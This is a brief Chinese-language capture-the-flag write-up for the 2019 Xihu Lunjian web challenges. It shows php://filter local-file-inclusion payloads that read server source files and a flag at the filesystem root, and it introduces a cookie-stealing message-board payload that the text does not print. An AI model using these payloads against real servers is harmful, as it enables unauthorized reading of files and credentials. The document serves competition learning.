2019 西湖论剑 WriteUp

Web

babyt3

登录看到:



尝试文件包含:

file=php://filter/read=convert.base64-encode/resource=index.php

得到源码:




读取dir.php的源码:

file=php://filter/read=convert.base64-encode/resource=dir.php

得到源码:

构造去查看根目录下:

dir.php?dir=/


然后去读取ffffflag_1s_Her4文件:

/?file=php://filter/read=convert.base64-encode/resource=/ffffflag_1s_Her4

得到flag

Breakout

进去看到留言板


使用下面payload可以弹到自己的cookie